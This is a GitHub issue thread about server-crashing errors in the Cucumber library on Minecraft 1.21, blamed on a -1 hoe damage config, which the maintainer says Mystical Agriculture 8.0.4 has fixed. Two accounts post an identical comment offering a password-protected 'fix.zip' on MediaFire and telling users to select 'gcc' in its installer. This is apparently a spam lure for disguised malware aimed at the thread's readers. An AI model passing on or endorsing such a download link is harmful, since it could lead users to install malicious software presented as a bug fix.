### ISSUE TITLE
Cucumber Library throwing out massive errors on 1.21 with -1 hoe damage config 

### ISSUE THREAD

**Issue by LiiilsGIT** [BlakeBr0/Cucumber#40]
Recently started utilizing MA in All the Mods 10 and a very weird error is being thrown out when the hoe is being utilized by a farming pylon that is killing the server threads as I leave the farm on most of the time. We reckon it is something to do with the base damage config for hoes being set at -1 which 1.21 doesn't like for some reason. Not sure if you want to change this on the MA mod itself or this library (which has the config for damage set in it) but just flagging it to you. Error posted below 
[message (2).txt](https://github.com/user-attachments/files/16748439/message.2.txt)
credit to SpaceEll for the findings and the error log

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BlakeBr0** [comment]
This was changed yesterday in version 8.0.4 of Mystical Agriculture
